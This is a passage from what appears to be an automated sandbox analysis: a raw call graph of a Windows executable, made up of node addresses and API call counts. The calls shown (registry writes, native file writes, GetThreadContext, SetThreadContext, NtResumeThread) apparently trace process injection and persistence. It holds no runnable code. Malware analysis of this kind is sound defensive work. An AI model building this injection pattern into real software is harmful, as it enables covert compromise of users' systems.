calls 31174->31177 31180 27fa101 31175->31180 31178 27d4860 11 API calls 31176->31178 31183 27f8b81 31177->31183 31182 27f997b 31178->31182 31181 27d47ec 11 API calls 31179->31181 31184 27d47ec 11 API calls 31180->31184 31187 27f7fd4 31181->31187 31185 27d47ec 11 API calls 31182->31185 31186 27d47ec 11 API calls 31183->31186 31188 27fa138 31184->31188 31191 27f99b2 31185->31191 31192 27f8bb8 31186->31192 31189 27e889c 22 API calls 31187->31189 31194 27e889c 22 API calls 31188->31194 31190 27f7ff8 31189->31190 32158 27e5aec 42 API calls 31190->32158 31197 27e889c 22 API calls 31191->31197 31198 27e889c 22 API calls 31192->31198 31196 27fa15c 31194->31196 31200 27d4860 11 API calls 31196->31200 31201 27f99d6 31197->31201 31202 27f8bdc 31198->31202 31199 27f8024 31208 27d4bcc 11 API calls 31199->31208 31212 27fa17d 31200->31212 31707 27d7e5c 31201->31707 32161 27ed01c 25 API calls 31202->32161 31205 27f8bf0 31207 27d4860 11 API calls 31205->31207 31216 27f8c16 31207->31216 31211 27f8039 31208->31211 31209 27f9c9a 31213 27d4860 11 API calls 31209->31213 31210 27d4860 11 API calls 31218 27f9a09 31210->31218 31214 27d4860 11 API calls 31211->31214 31215 27d47ec 11 API calls 31212->31215 31217 27f9cbb 31213->31217 31220 27f805a 31214->31220 31221 27fa1b4 31215->31221 31219 27d47ec 11 API calls 31216->31219 31222 27d47ec 11 API calls 31217->31222 31223 27d47ec 11 API calls 31218->31223 31227 27f8c4d 31219->31227 31224 27d47ec 11 API calls 31220->31224 31225 27e889c 22 API calls 31221->31225 31229 27f9cf2 31222->31229 31230 27f9a40 31223->31230 31231 27f8091 31224->31231 31226 27fa1d8 31225->31226 31228 27d4860 11 API calls 31226->31228 31232 27e889c 22 API calls 31227->31232 31241 27fa1f9 31228->31241 31233 27e889c 22 API calls 31229->31233 31234 27e889c 22 API calls 31230->31234 31237 27e889c 22 API calls 31231->31237 31235 27f8c71 31232->31235 31238 27f9d16 31233->31238 31239 27f9a64 31234->31239 31236 27d4860 11 API calls 31235->31236 31245 27f8c92 31236->31245 31240 27f80b5 31237->31240 31242 27d4860 11 API calls 31238->31242 31243 27d4860 11 API calls 31239->31243 31246 27d49f8 11 API calls 31240->31246 31244 27d47ec 11 API calls 31241->31244 31247 27f9d37 31242->31247 31248 27f9a85 31243->31248 31252 27fa230 31244->31252 31250 27d47ec 11 API calls 31245->31250 31249 27f80d2 31246->31249 31253 27d47ec 11 API calls 31247->31253 31254 27d47ec 11 API calls 31248->31254 32159 27e7e50 17 API calls 31249->32159 31258 27f8cc9 31250->31258 31257 27e889c 22 API calls 31252->31257 31259 27f9d6e 31253->31259 31260 27f9abc 31254->31260 31255 27f80d8 31256 27d4860 11 API calls 31255->31256 31261 27f80f9 31256->31261 31263 27fa254 31257->31263 31262 27e889c 22 API calls 31258->31262 31264 27e889c 22 API calls 31259->31264 31265 27e889c 22 API calls 31260->31265 31267 27d47ec 11 API calls 31261->31267 31266 27f8ced 31262->31266 31271 27e889c 22 API calls 31263->31271 31268 27f9d92 31264->31268 31269 27f9ae0 31265->31269 31270 27d4860 11 API calls 31266->31270 31275 27f8130 31267->31275 31272 27d4860 11 API calls 31268->31272 31273 27d4860 11 API calls 31269->31273 31274 27f8d0e 31270->31274 31277 27fa287 31271->31277 31278 27f9db3 31272->31278 31276 27f9b01 31273->31276 31279 27d47ec 11 API calls 31274->31279 31280 27e889c 22 API calls 31275->31280 31283 27d47ec 11 API calls 31276->31283 31281 27e889c 22 API calls 31277->31281 31282 27d47ec 11 API calls 31278->31282 31286 27f8d45 31279->31286 31284 27f8154 31280->31284 31287 27fa2ba 31281->31287 31288 27f9dea 31282->31288 31289 27f9b38 31283->31289 31285 27d4860 11 API calls 31284->31285 31291 27f8175 31285->31291 31290 27e889c 22 API calls 31286->31290 31292 27e889c 22 API calls 31287->31292 31293 27e889c 22 API calls 31288->31293 31294 27e889c 22 API calls 31289->31294 31295 27f8d69 31290->31295 31296 27d47ec 11 API calls 31291->31296 31305 27fa2ed 31292->31305 31297 27f9e0e 31293->31297 31298 27f9b5c 31294->31298 31299 27f8d89 31295->31299 31300 27f8d72 31295->31300 31306 27f81ac 31296->31306 31301 27d4860 11 API calls 31297->31301 31302 27d4860 11 API calls 31298->31302 31304 27d4860 11 API calls 31299->31304 32162 27e85fc 17 API calls 31300->32162 31309 27f9e2f 31301->31309 31310 27f9b7d 31302->31310 31307 27f8daa 31304->31307 31308 27e889c 22 API calls 31305->31308 31311 27e889c 22 API calls 31306->31311 31313 27d47ec 11 API calls 31307->31313 31317 27fa320 31308->31317 31315 27d47ec 11 API calls 31309->31315 31312 27d47ec 11 API calls 31310->31312 31314 27f81d0 31311->31314 31320 27f9bb4 31312->31320 31321 27f8de1 31313->31321 31316 27d4860 11 API calls 31314->31316 31319 27f9e66 31315->31319 31323 27f81f1 31316->31323 31318 27e889c 22 API calls 31317->31318 31322 27fa353 31318->31322 31325 27e889c 22 API calls 31319->31325 31326 27e889c 22 API calls 31320->31326 31327 27e889c 22 API calls 31321->31327 31324 27d4860 11 API calls 31322->31324 31331 27d47ec 11 API calls 31323->31331 31336 27fa374 31324->31336 31328 27f9e8a 31325->31328 31329 27f9bd8 31326->31329 31330 27f8e05 31327->31330 31726 27d49f8 31328->31726 31333 27d4860 11 API calls 31329->31333 31334 27d4860 11 API calls 31330->31334 31338 27f8228 31331->31338 31341 27f9bf9 31333->31341 31339 27f8e26 31334->31339 31340 27d47ec 11 API calls 31336->31340 31342 27e889c 22 API calls 31338->31342 31343 27d47ec 11 API calls 31339->31343 31347 27fa3ab 31340->31347 31345 27d47ec 11 API calls 31341->31345 31344 27f824c 31342->31344 31350 27f8e5d 31343->31350 31346 27d4860 11 API calls 31344->31346 31349 27f9c30 31345->31349 31352 27f826d 31346->31352 31348 27e889c 22 API calls 31347->31348 31351 27fa3cf 31348->31351 31354 27e889c 22 API calls 31349->31354 31355 27e889c 22 API calls 31350->31355 31353 27d4860 11 API calls 31351->31353 31357 27d47ec 11 API calls 31352->31357 31359 27fa3f0 31353->31359 31364 27f9c54 31354->31364 31356 27f8e81 31355->31356 31358 27d4860 11 API calls 31356->31358 31360 27f82a4 31357->31360 31362 27f8ea2 31358->31362 31361 27d47ec 11 API calls 31359->31361 31363 27e889c 22 API calls 31360->31363 31369 27fa427 31361->31369 31365 27d47ec 11 API calls 31362->31365 31366 27f82c8 31363->31366 31711 27edf80 31364->31711 31370 27f8ed9 31365->31370 32160 27eafd0 41 API calls 31366->32160 31371 27e889c 22 API calls 31369->31371 31373 27e889c 22 API calls 31370->31373 31375 27fa44b 31371->31375 31372 27f82d9 31374 27f8efd ResumeThread 31373->31374 31376 27d4860 11 API calls 31374->31376 31377 27e889c 22 API calls 31375->31377 31380 27f8f29 31376->31380 31378 27fa47e 31377->31378 31379 27d4860 11 API calls 31378->31379 31382 27fa49f 31379->31382 31381 27d47ec 11 API calls 31380->31381 31383 27f8f60 31381->31383 31384 27d47ec 11 API calls 31382->31384 31385 27e889c 22 API calls 31383->31385 31387 27fa4d6 31384->31387 31386 27f8f84 31385->31386 31388 27d4860 11 API calls 31386->31388 31389 27e889c 22 API calls 31387->31389 31392 27f8fa5 31388->31392 31390 27fa4fa 31389->31390 31391 27d4860 11 API calls 31390->31391 31394 27fa51b 31391->31394 31393 27d47ec 11 API calls 31392->31393 31395 27f8fdc 31393->31395 31396 27d47ec 11 API calls 31394->31396 31397 27e889c 22 API calls 31395->31397 31400 27fa552 31396->31400 31398 27f9000 31397->31398 31399 27d4860 11 API calls 31398->31399 31404 27f9021 31399->31404 31401 27e889c 22 API calls 31400->31401 31402 27fa576 31401->31402 31403 27d4860 11 API calls 31402->31403 31406 27fa597 31403->31406 31405 27d47ec 11 API calls 31404->31405 31408 27f9058 31405->31408 31407 27d47ec 11 API calls 31406->31407 31412 27fa5ce 31407->31412 31409 27e889c 22 API calls 31408->31409 31410 27f907c CloseHandle 31409->31410 31411 27d4860 11 API calls 31410->31411 31414 27f90a8 31411->31414 31413 27e889c 22 API calls 31412->31413 31415 27fa5f2 31413->31415 31416 27d47ec 11 API calls 31414->31416 31417 27e889c 22 API calls 31415->31417 31418 27f90df 31416->31418 31419 27fa625 31417->31419 31420 27e889c 22 API calls 31418->31420 31423 27e889c 22 API calls 31419->31423 31421 27f9103 31420->31421 31422 27d4860 11 API calls 31421->31422 31424 27f9124 31422->31424 31425 27fa658 31423->31425 31427 27d47ec 11 API calls 31424->31427 31426 27e889c 22 API calls 31425->31426 31428 27fa68b 31426->31428 31429 27f915b 31427->31429 31430 27e889c 22 API calls 31428->31430 31431 27e889c 22 API calls 31429->31431 31432 27fa6be 31430->31432 31433 27f917f 31431->31433 31434 27d4860 11 API calls 31432->31434 31435 27d4860 11 API calls 31433->31435 31437 27fa6df 31434->31437 31436 27f91a0 31435->31436 31438 27d47ec 11 API calls 31436->31438 31439 27d47ec 11 API calls 31437->31439 31441 27f91d7 31438->31441 31440 27fa716 31439->31440 31442 27e889c 22 API calls 31440->31442 31443 27e889c 22 API calls 31441->31443 31444 27fa73a 31442->31444 31445 27f91fb 31443->31445 31446 27d4860 11 API calls 31444->31446 31447 27d4860 11 API calls 31445->31447 31449 27fa75b 31446->31449 31448 27f921c 31447->31448 31450 27d47ec 11 API calls 31448->31450 31451 27d47ec 11 API calls 31449->31451 31453 27f9253 31450->31453 31452 27fa792 31451->31452 31454 27e889c 22 API calls 31452->31454 31455 27e889c 22 API calls 31453->31455 31458 27fa7b6 31454->31458 31456 27f9277 31455->31456 31457 27d4860 11 API calls 31456->31457 31460 27f9298 31457->31460 31459 27e889c 22 API calls 31458->31459 31462 27fa7e9 31459->31462 31461 27d47ec 11 API calls 31460->31461 31463 27f92cf 31461->31463 31464 27e889c 22 API calls 31462->31464 31465 27e889c 22 API calls 31463->31465 31467 27fa81c 31464->31467 31466 27f92f3 31465->31466 31468 27d4860 11 API calls 31466->31468 31469 27e889c 22 API calls 31467->31469 31470 27f9314 31468->31470 31471 27fa84f 31469->31471 31472 27d47ec 11 API calls 31470->31472 31473 27e889c 22 API calls 31471->31473 31474 27f934b 31472->31474 31476 27fa882 31473->31476 31475 27e889c 22 API calls 31474->31475 31477 27f936f 31475->31477 31478 27e889c 22 API calls 31476->31478 31479 27d4860 11 API calls 31477->31479 31480 27fa8b5 31478->31480 31482 27f9390 31479->31482 31481 27d4860 11 API calls 31480->31481 31483 27fa8d6 31481->31483 31484 27d47ec 11 API calls 31482->31484 31485 27d47ec 11 API calls 31483->31485 31486 27f93c7 31484->31486 31488 27fa90d 31485->31488 31487 27e889c 22 API calls 31486->31487 31489 27f93eb 31487->31489 31490 27e889c 22 API calls 31488->31490 32163 27e8818 LoadLibraryW 31489->32163 31491 27fa931 31490->31491 31492 27d4860 11 API calls 31491->31492 31497 27fa952 31492->31497 31495 27e8818 21 API calls 31496 27f941e 31495->31496 31498 27e8818 21 API calls 31496->31498 31500 27d47ec 11 API calls 31497->31500 31499 27f9432 31498->31499 31501 27e8818 21 API calls 31499->31501 31506 27fa989 31500->31506 31502 27f9446 31501->31502 31503 27e8818 21 API calls 31502->31503 31504 27f945a 31503->31504 31505 27e8818 21 API calls 31504->31505 31507 27f946e CloseHandle 31505->31507 31509 27e889c 22 API calls 31506->31509 31508 27d4860 11 API calls 31507->31508 31512 27f949a 31508->31512 31510 27fa9ad 31509->31510 31511 27d4860 11 API calls 31510->31511 31513 27fa9ce 31511->31513 31514 27d47ec 11 API calls 31512->31514 31515 27d47ec 11 API calls 31513->31515 31516 27f94d1 31514->31516 31517 27faa05 31515->31517 31518 27e889c 22 API calls 31516->31518 31521 27e889c 22 API calls 31517->31521 31519 27f94f5 31518->31519 31520 27d4860 11 API calls 31519->31520 31524 27f9516 31520->31524 31522 27faa29 31521->31522 31523 27d4860 11 API calls 31522->31523 31525 27faa4a 31523->31525 31526 27d47ec 11 API calls 31524->31526 31527 27d47ec 11 API calls 31525->31527 31528 27f954d 31526->31528 31529 27faa81 31527->31529 31530 27e889c 22 API calls 31528->31530 31531 27e889c 22 API calls 31529->31531 31530->30991 31532 27faaa5 31531->31532 31533 27d4860 11 API calls 31532->31533 31534 27faac6 31533->31534 31535 27d47ec 11 API calls 31534->31535 31536 27faafd 31535->31536 31537 27e889c 22 API calls 31536->31537 31538 27fab21 31537->31538 31539 27e889c 22 API calls 31538->31539 31540 27fab30 31539->31540 31541 27e889c 22 API calls 31540->31541 31542 27fab3f 31541->31542 31543 27e889c 22 API calls 31542->31543 31544 27fab4e 31543->31544 31545 27e889c 22 API calls 31544->31545 31546 27fab5d 31545->31546 31547 27e889c 22 API calls 31546->31547 31548 27fab6c 31547->31548 31549 27e889c 22 API calls 31548->31549 31550 27fab7b 31549->31550 31551 27e889c 22 API calls 31550->31551 31552 27fab8a 31551->31552 31553 27e889c 22 API calls 31552->31553 31554 27fab99 31553->31554 31555 27e889c 22 API calls 31554->31555 31556 27faba8 31555->31556 31557 27e889c 22 API calls 31556->31557 31558 27fabb7 31557->31558 31559 27e889c 22 API calls 31558->31559 31560 27fabc6 31559->31560 31561 27e889c 22 API calls 31560->31561 31562 27fabd5 31561->31562 31563 27e889c 22 API calls 31562->31563 31564 27fabe4 31563->31564 31565 27e889c 22 API calls 31564->31565 31566 27fabf3 31565->31566 31567 27e889c 22 API calls 31566->31567 31568 27fac02 31567->31568 31569 27d4860 11 API calls 31568->31569 31570 27fac23 31569->31570 31571 27d47ec 11 API calls 31570->31571 31572 27fac5a 31571->31572 31573 27e889c 22 API calls 31572->31573 31574 27fac7e 31573->31574 31575 27e889c 22 API calls 31574->31575 31576 27facb1 31575->31576 31577 27e889c 22 API calls 31576->31577 31578 27face4 31577->31578 31579 27e889c 22 API calls 31578->31579 31580 27fad17 31579->31580 31581 27e889c 22 API calls 31580->31581 31582 27fad4a 31581->31582 31583 27e889c 22 API calls 31582->31583 31584 27fad7d 31583->31584 31585 27e889c 22 API calls 31584->31585 31586 27fadb0 31585->31586 31587 27e889c 22 API calls 31586->31587 31588 27fade3 31587->31588 31589 27d4860 11 API calls 31588->31589 31590 27fae04 31589->31590 31591 27d47ec 11 API calls 31590->31591 31592 27fae3b 31591->31592 31593 27e889c 22 API calls 31592->31593 31594 27fae5f 31593->31594 31595 27d4860 11 API calls 31594->31595 31596 27fae80 31595->31596 31597 27d47ec 11 API calls 31596->31597 31598 27faeb7 31597->31598 31599 27e889c 22 API calls 31598->31599 31600 27faedb 31599->31600 31601 27d4860 11 API calls 31600->31601 31602 27faefc 31601->31602 31603 27d47ec 11 API calls 31602->31603 31604 27faf33 31603->31604 31605 27e889c 22 API calls 31604->31605 31606 27faf57 31605->31606 31607 27e889c 22 API calls 31606->31607 31608 27faf8a 31607->31608 31609 27e889c 22 API calls 31608->31609 31610 27fafbd 31609->31610 31611 27e889c 22 API calls 31610->31611 31612 27faff0 31611->31612 31613 27e889c 22 API calls 31612->31613 31614 27fb023 31613->31614 31615 27e889c 22 API calls 31614->31615 31616 27fb056 31615->31616 31617 27e889c 22 API calls 31616->31617 31618 27fb089 31617->31618 31619 27e889c 22 API calls 31618->31619 31620 27fb0bc 31619->31620 31621 27e889c 22 API calls 31620->31621 31622 27fb0ef 31621->31622 31623 27e889c 22 API calls 31622->31623 31624 27fb122 31623->31624 31625 27e889c 22 API calls 31624->31625 31626 27fb155 31625->31626 31627 27e889c 22 API calls 31626->31627 31628 27fb188 31627->31628 31629 27e889c 22 API calls 31628->31629 31630 27fb1bb 31629->31630 31631 27e889c 22 API calls 31630->31631 31632 27fb1ee 31631->31632 31633 27e889c 22 API calls 31632->31633 31634 27fb221 31633->31634 31635 27e889c 22 API calls 31634->31635 31636 27fb254 31635->31636 31637 27e889c 22 API calls 31636->31637 31638 27fb287 31637->31638 31639 27e889c 22 API calls 31638->31639 31640 27fb2ba 31639->31640 31641 27e889c 22 API calls 31640->31641 31642 27fb2ed 31641->31642 31643 27e889c 22 API calls 31642->31643 31644 27fb320 31643->31644 32133 27e8204 31644->32133 31647 27d4860 11 API calls 31648 27fb350 31647->31648 31649 27d47ec 11 API calls 31648->31649 31650 27fb387 31649->31650 31651 27e889c 22 API calls 31650->31651 31652 27fb3ab 31651->31652 31653 27d4860 11 API calls 31652->31653 31654 27fb3cc 31653->31654 31655 27d47ec 11 API calls 31654->31655 31656 27fb403 31655->31656 31657 27e889c 22 API calls 31656->31657 31658 27fb427 31657->31658 31659 27d4860 11 API calls 31658->31659 31660 27fb448 31659->31660 31661 27d47ec 11 API calls 31660->31661 31662 27fb47f 31661->31662 31663 27e889c 22 API calls 31662->31663 31664 27fb4a3 ExitProcess 31663->31664 31666 27e88b0 31665->31666 31667 27e88cf LoadLibraryA 31666->31667 32170 27d49a0 31667->32170 31670 27d49a0 31671 27e88f2 GetProcAddress 31670->31671 31672 27e8919 31671->31672 31673 27e7d78 18 API calls 31672->31673 31674 27e895d FreeLibrary 31673->31674 31675 27e8975 31674->31675 31676 27d4500 11 API calls 31675->31676 31677 27e8982 31676->31677 31677->30855 31679 27ee408 31678->31679 31680 27ee48b 31679->31680 31683 27d49f8 11 API calls 31679->31683 31681 27d44dc 11 API calls 31680->31681 31682 27ee493 31681->31682 31684 27d4530 11 API calls 31682->31684 31683->31679 31685 27ee49e 31684->31685 31686 27d4500 11 API calls 31685->31686 31687 27ee4b8 31686->31687 31687->30882 31689 27ef51f 31688->31689 31690 27ef54a RegOpenKeyA 31689->31690 31691 27ef558 31690->31691 31692 27d49f8 11 API calls 31691->31692 31693 27ef570 31692->31693 31694 27ef57d RegSetValueExA RegCloseKey 31693->31694 31695 27ef5a1 31694->31695 31696 27d4500 11 API calls 31695->31696 31697 27ef5ae 31696->31697 31698 27d44dc 11 API calls 31697->31698 31699 27ef5b6 31698->31699 31699->30885 31705 27ef3ad 31700->31705 31701 27ef3d9 31702 27d44dc 11 API calls 31701->31702 31704 27ef3ee 31702->31704 31704->31143 31705->31701 32172 27d46c4 11 API calls 31705->32172 32173 27d4530 11 API calls 31705->32173 31708 27d49a0 31707->31708 31709 27d7e66 GetFileAttributesA 31708->31709 31710 27d7e71 31709->31710 31710->31209 31710->31210 31712 27edf96 31711->31712 32174 27d4f20 31712->32174 31714 27edf9e 31715 27edfbe RtlDosPathNameToNtPathName_U 31714->31715 32178 27eded0 31715->32178 31717 27edfda NtCreateFile 31718 27ee005 31717->31718 31719 27d49f8 11 API calls 31718->31719 31720 27ee017 NtWriteFile NtClose 31719->31720 31721 27ee041 31720->31721 32179 27d4c60 31721->32179 31724 27d44dc 11 API calls 31725 27ee051 31724->31725 31725->31209 31727 27d49ac 31726->31727 31728 27d45a0 11 API calls 31727->31728 31730 27d49e7 31727->31730 31729 27d49c3 31728->31729 31729->31730 31731 27d2c2c 11 API calls 31729->31731 31732 27e8c28 31730->31732 31731->31730 31733 27e8c30 31732->31733 31734 27d4860 11 API calls 31733->31734 31735 27e8c73 31734->31735 31736 27d47ec 11 API calls 31735->31736 31737 27e8c98 31736->31737 31738 27e889c 22 API calls 31737->31738 31739 27e8cb3 31738->31739 31740 27d4860 11 API calls 31739->31740 31741 27e8ccc 31740->31741 31742 27d47ec 11 API calls 31741->31742 31743 27e8cf1 31742->31743 31744 27e889c 22 API calls 31743->31744 31745 27e8d0c 31744->31745 31746 27ea76f 31745->31746 31747 27d4860 11 API calls 31745->31747 31748 27d4500 11 API calls 31746->31748 31751 27e8d3d 31747->31751 31749 27ea78c 31748->31749 31750 27d4500 11 API calls 31749->31750 31752 27ea79c 31750->31752 31754 27d47ec 11 API calls 31751->31754 31753 27d4c60 SysFreeString 31752->31753 31755 27ea7a7 31753->31755 31759 27e8d62 31754->31759 31756 27d4500 11 API calls 31755->31756 31757 27ea7b7 31756->31757 31758 27d44dc 11 API calls 31757->31758 31760 27ea7bf 31758->31760 31762 27e889c 22 API calls 31759->31762 31761 27d4500 11 API calls 31760->31761 31763 27ea7cc 31761->31763 31765 27e8d7d 31762->31765 31764 27d4500 11 API calls 31763->31764 31766 27ea7d9 31764->31766 31767 27d4860 11 API calls 31765->31767 31766->31053 31768 27e8d96 31767->31768 31769 27d47ec 11 API calls 31768->31769 31770 27e8dbb 31769->31770 31771 27e889c 22 API calls 31770->31771 31772 27e8dd6 31771->31772 31772->31746 31773 27d4860 11 API calls 31772->31773 31774 27e8e1e 31773->31774 31775 27d47ec 11 API calls 31774->31775 31776 27e8e43 31775->31776 31777 27e889c 22 API calls 31776->31777 31778 27e8e5e 31777->31778 31779 27d4860 11 API calls 31778->31779 31780 27e8e77 31779->31780 31781 27d47ec 11 API calls 31780->31781 31782 27e8e9c 31781->31782 31783 27e889c 22 API calls 31782->31783 31784 27e8eb7 31783->31784 31785 27d4860 11 API calls 31784->31785 31786 27e8efc 31785->31786 31787 27d47ec 11 API calls 31786->31787 31788 27e8f21 31787->31788 31789 27e889c 22 API calls 31788->31789 31790 27e8f3c 31789->31790 31791 27d4860 11 API calls 31790->31791 31792 27e8f55 31791->31792 31793 27d47ec 11 API calls 31792->31793 31794 27e8f7d 31793->31794 31795 27e889c 22 API calls 31794->31795 31796 27e8f9b 31795->31796 31797 27d4860 11 API calls 31796->31797 31798 27e8fb7 31797->31798 31799 27d47ec 11 API calls 31798->31799 31800 27e8fe8 31799->31800 31801 27e889c 22 API calls 31800->31801 31802 27e900c 31801->31802 31803 27d4860 11 API calls 31802->31803 31804 27e9028 31803->31804 31805 27d47ec 11 API calls 31804->31805 31806 27e9059 31805->31806 31807 27e889c 22 API calls 31806->31807 31808 27e907d 31807->31808 31809 27d4860 11 API calls 31808->31809 31810 27e9099 31809->31810 31811 27d47ec 11 API calls 31810->31811 31812 27e90ca 31811->31812 31813 27e889c 22 API calls 31812->31813 31814 27e90ee 31813->31814 32182 27e8654 31814->32182 31817 27e91a0 31818 27d4860 11 API calls 31817->31818 31820 27e91bc 31818->31820 31819 27d4860 11 API calls 31821 27e914b 31819->31821 31823 27d47ec 11 API calls 31820->31823 31822 27d47ec 11 API calls 31821->31822 31825 27e917c 31822->31825 31824 27e91ed 31823->31824 31826 27e889c 22 API calls 31824->31826 31827 27e889c 22 API calls 31825->31827 31828 27e9211 31826->31828 31827->31817 31829 27e889c 22 API calls 31828->31829 31830 27e9244 31829->31830 31831 27d4860 11 API calls 31830->31831 31832 27e9260 31831->31832 31833 27d47ec 11 API calls 31832->31833 31834 27e9291 31833->31834 31835 27e889c 22 API calls 31834->31835 31836 27e92b5 31835->31836 31837 27d4860 11 API calls 31836->31837 31838 27e92d1 31837->31838 31839 27d47ec 11 API calls 31838->31839 31840 27e9302 31839->31840 31841 27e889c 22 API calls 31840->31841 31842 27e9326 31841->31842 31843 27d2ee0 2 API calls 31842->31843 31844 27e932b 31843->31844 31845 27d4860 11 API calls 31844->31845 31846 27e936e 31845->31846 31847 27d47ec 11 API calls 31846->31847 31848 27e939f 31847->31848 31849 27e889c 22 API calls 31848->31849 31850 27e93c3 31849->31850 31851 27d4860 11 API calls 31850->31851 31852 27e93df 31851->31852 31853 27d47ec 11 API calls 31852->31853 31854 27e9410 31853->31854 31855 27e889c 22 API calls 31854->31855 31856 27e9434 31855->31856 31857 27d4860 11 API calls 31856->31857 31858 27e9450 31857->31858 31859 27d47ec 11 API calls 31858->31859 31860 27e9481 31859->31860 31861 27e889c 22 API calls 31860->31861 31862 27e94a5 GetThreadContext 31861->31862 31862->31746 31863 27e94c7 31862->31863 31864 27d4860 11 API calls 31863->31864 31865 27e94e3 31864->31865 31866 27d47ec 11 API calls 31865->31866 31867 27e9514 31866->31867 31868 27e889c 22 API calls 31867->31868 31869 27e9538 31868->31869 31870 27d4860 11 API calls 31869->31870 31871 27e9554 31870->31871 31872 27d47ec 11 API calls 31871->31872 31873 27e9585 31872->31873 31874 27e889c 22 API calls 31873->31874 31875 27e95a9 31874->31875 31876 27d4860 11 API calls 31875->31876 31877 27e95c5 31876->31877 31878 27d47ec 11 API calls 31877->31878 31879 27e95f6 31878->31879 31880 27e889c 22 API calls 31879->31880 31881 27e961a 31880->31881 31882 27d4860 11 API calls 31881->31882 31883 27e9636 31882->31883 31884 27d47ec 11 API calls 31883->31884 31885 27e9667 31884->31885 31886 27e889c 22 API calls 31885->31886 31887 27e968b 31886->31887 31888 27d4860 11 API calls 31887->31888 31889 27e96a7 31888->31889 31890 27d47ec 11 API calls 31889->31890 31891 27e96d8 31890->31891 31892 27e889c 22 API calls 31891->31892 31893 27e96fc 31892->31893 32194 27e82cc 31893->32194 31896 27e9a37 31899 27d4860 11 API calls 31896->31899 31897 27e9730 31898 27d4860 11 API calls 31897->31898 31901 27e974c 31898->31901 31900 27e9a53 31899->31900 31902 27d47ec 11 API calls 31900->31902 31903 27d47ec 11 API calls 31901->31903 31904 27e9a84 31902->31904 31905 27e977d 31903->31905 31906 27e889c 22 API calls 31904->31906 31907 27e889c 22 API calls 31905->31907 31973 27e9a30 31906->31973 31908 27e97a1 31907->31908 31910 27d4860 11 API calls 31908->31910 31909 27d4860 11 API calls 31912 27e9ac4 31909->31912 31911 27e97bd 31910->31911 31914 27d47ec 11 API calls 31911->31914 31913 27d47ec 11 API calls 31912->31913 31915 27e9af5 31913->31915 31916 27e97ee 31914->31916 31917 27e889c 22 API calls 31915->31917 31918 27e889c 22 API calls 31916->31918 31919 27e9b19 31917->31919 31920 27e9812 31918->31920 31921 27d4860 11 API calls 31919->31921 31922 27d4860 11 API calls 31920->31922 31924 27e9b35 31921->31924 31923 27e982e 31922->31923 31925 27d47ec 11 API calls 31923->31925 31926 27d47ec 11 API calls 31924->31926 31928 27e985f 31925->31928 31927 27e9b66 31926->31927 31929 27e889c 22 API calls 31927->31929 31930 27e889c 22 API calls 31928->31930 31931 27e9b8a 31929->31931 31932 27e9883 31930->31932 31933 27d4860 11 API calls 31931->31933 32208 27e853c 31932->32208 31939 27e9ba6 31933->31939 31936 27e989b 31940 27e7a2c 18 API calls 31936->31940 31937 27e98c3 31938 27d4860 11 API calls 31937->31938 31944 27e98df 31938->31944 31942 27d47ec 11 API calls 31939->31942 31941 27e98bc 31940->31941 31943 27d4860 11 API calls 31941->31943 31946 27e9bd7 31942->31946 31947 27e9950 31943->31947 31945 27d47ec 11 API calls 31944->31945 31951 27e9910 31945->31951 31948 27e889c 22 API calls 31946->31948 31949 27d47ec 11 API calls 31947->31949 31950 27e9bfb 31948->31950 31955 27e9981 31949->31955 31952 27e7a2c 18 API calls 31950->31952 31954 27e889c 22 API calls 31951->31954 31953 27e9c1c 31952->31953 31953->31746 31956 27d4860 11 API calls 31953->31956 31954->31941 31957 27e889c 22 API calls 31955->31957 31960 27e9c4a 31956->31960 31958 27e99a5 31957->31958 31959 27d4860 11 API calls 31958->31959 31962 27e99c1 31959->31962 31961 27d47ec 11 API calls 31960->31961 31964 27e9c7b 31961->31964 31963 27d47ec 11 API calls 31962->31963 31967 27e99f2 31963->31967 31965 27e889c 22 API calls 31964->31965 31966 27e9c9f 31965->31966 31968 27d4860 11 API calls 31966->31968 31969 27e889c 22 API calls 31967->31969 31972 27e9cbb 31968->31972 31970 27e9a16 31969->31970 32222 27e7a2c 31970->32222 31974 27d47ec 11 API calls 31972->31974 31973->31909 31975 27e9cec 31974->31975 31976 27e889c 22 API calls 31975->31976 31977 27e9d10 31976->31977 32236 27e8b38 31977->32236 31979 27d4860 11 API calls 31981 27e9d97 31979->31981 31980 27e9d17 31980->31979 31982 27d47ec 11 API calls 31981->31982 31983 27e9dc8 31982->31983 31984 27e889c 22 API calls 31983->31984 31985 27e9dec 31984->31985 31986 27d4860 11 API calls 31985->31986 31987 27e9e08 31986->31987 31988 27d47ec 11 API calls 31987->31988 31989 27e9e39 31988->31989 31990 27e889c 22 API calls 31989->31990 31991 27e9e5d 31990->31991 31992 27d4860 11 API calls 31991->31992 31993 27e9e79 31992->31993 31994 27d47ec 11 API calls 31993->31994 31995 27e9eaa 31994->31995 31996 27e889c 22 API calls 31995->31996 31997 27e9ece 31996->31997 31998 27e7d78 18 API calls 31997->31998 31999 27e9eeb 31998->31999 32000 27d4860 11 API calls 31999->32000 32001 27e9f07 32000->32001 32002 27d47ec 11 API calls 32001->32002 32003 27e9f38 32002->32003 32004 27e889c 22 API calls 32003->32004 32005 27e9f5c 32004->32005 32006 27d4860 11 API calls 32005->32006 32007 27e9f78 32006->32007 32008 27d47ec 11 API calls 32007->32008 32009 27e9fa9 32008->32009 32010 27e889c 22 API calls 32009->32010 32011 27e9fcd 32010->32011 32012 27d4860 11 API calls 32011->32012 32013 27e9fe9 32012->32013 32014 27d47ec 11 API calls 32013->32014 32015 27ea01a 32014->32015 32016 27e889c 22 API calls 32015->32016 32017 27ea03e 32016->32017 32018 27e7d78 18 API calls 32017->32018 32019 27ea05e 32018->32019 32020 27d4860 11 API calls 32019->32020 32021 27ea07a 32020->32021 32022 27d47ec 11 API calls 32021->32022 32023 27ea0ab 32022->32023 32024 27e889c 22 API calls 32023->32024 32025 27ea0cf 32024->32025 32026 27d4860 11 API calls 32025->32026 32027 27ea0eb 32026->32027 32028 27d47ec 11 API calls 32027->32028 32029 27ea11c 32028->32029 32030 27e889c 22 API calls 32029->32030 32031 27ea140 32030->32031 32032 27d4860 11 API calls 32031->32032 32033 27ea15c 32032->32033 32034 27d47ec 11 API calls 32033->32034 32035 27ea18d 32034->32035 32036 27e889c 22 API calls 32035->32036 32037 27ea1b1 SetThreadContext NtResumeThread 32036->32037 32038 27d4860 11 API calls 32037->32038 32039 27ea1fd 32038->32039 32040 27d47ec 11 API calls 32039->32040 32041 27ea22e 32040->32041 32042 27e889c 22 API calls 32041->32042 32043 27ea252 32042->32043 32044 27d4860 11 API calls 32043->32044 32045 27ea26e 32044->32045 32046 27d47ec 11 API calls 32045->32046 32047 27ea29f 